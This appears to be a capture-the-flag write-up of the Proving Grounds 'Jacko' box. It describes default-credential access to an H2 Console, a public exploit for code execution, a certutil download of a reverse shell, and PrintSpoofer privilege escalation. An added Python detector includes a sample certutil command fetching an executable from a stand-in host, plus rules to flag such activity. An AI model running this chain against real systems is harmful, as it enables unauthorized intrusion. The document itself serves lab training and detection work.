Jacko is part of the Proving Grounds paid subscription, Practice. It's also part of the OSCP-like boxes list, which means it is great to practice on for those studying up and preparing for the OSCP certification.
This box has an OffSec rating of Intermediate, whilst the OffSec community rated it as Hard. Let's get stuck in.
We start with nmap:
sudo nmap -sC -sV -p- 192.168.247.66 -oA nmap/full
We first test null sessions and anonymous logins against SMB on port 445, but there are none. We move on to the web apps on ports 80 and 8082 and are presented with the following:
And on port 8082...
We can tell from the support documents and some general prodding that we are dealing with H2 Console, a Java-based management tool for databases. I personally have never played around with it before. I try some default passwords, including no password, and we manage to connect.
The users section seems juicy, but there is nothing of interest there. We do now have an exact version number, so we check searchsploit.
We have a hit for our version, which looks promising. We make a copy.
searchsploit -m java/local/49384.txt
We take a read of the details and also come across this website outlining the PoC. There is even a helpful video at the bottom which shows the user pasting the contents of the exploit straight into the text area of the app. So let's do that, because we are impatient.
And we get code execution!
Let's play around with the inputs to enumerate a bit more.
Let's start the fun by creating a reverse shell. I named my file 445.exe as I am going to set up my listener on port 445 as well.
Start our trusty web server…
Let’s use certutil to download the file. I had a lot of issues with syntax, so it’s important to experiment. Note the double slashes.
And then execute the reverse shell.
And we get that lovely little feeling.
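As an added defensive example (not part of the original writeup), here is a small Python detector run over constructed process-creation events that flags the two behaviours in the chain above: the H2 console's JVM spawning a command shell, and certutil fetching a file from a remote URL. The event fields, paths and the 192.0.2.10 address are assumptions, not values from the box.

```python
import re

# Constructed Sysmon-style process-creation events (not real logs from the box):
# the H2 console starting normally, the JVM spawning a shell, that shell
# calling certutil to fetch a file from a web server, and a benign certutil use.
SAMPLE_EVENTS = [
    {"parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Program Files\\H2\\java.exe",
     "cmdline": "java -cp h2.jar org.h2.tools.Console"},
    {"parent": "C:\\Program Files\\H2\\java.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://192.0.2.10/445.exe 445.exe"},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\Users\\user\\setup.msi SHA256"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return the names of the rules this event matches (empty if benign)."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    # Rule 1: the database engine's JVM has no business spawning a shell.
    if parent == "java.exe" and image in SHELLS:
        hits.append("db_process_spawned_shell")
    # Rule 2: certutil pulling content from a URL is a LOLBin download;
    # local hashing or cert handling does not trip this.
    if image == "certutil.exe" and URL_RE.search(event["cmdline"]):
        hits.append("certutil_remote_download")
    return hits

def scan(events):
    """Map each offending command line to the rules it tripped."""
    return {e["cmdline"]: detect(e) for e in events if detect(e)}

if __name__ == "__main__":
    for cmdline, rules in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules)}: {cmdline}")
```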
I could not execute a number of binaries from my path, so I had to change directories to the C:\Windows\system32 folder and run most binaries from there, including systeminfo and whoami.
We have SeImpersonatePrivilege enabled. This is always my first check when landing on a box. Juicy Potato will not work on this machine as its build number is too recent, so instead we can use PrintSpoofer. Let's upload that.
We execute and get system!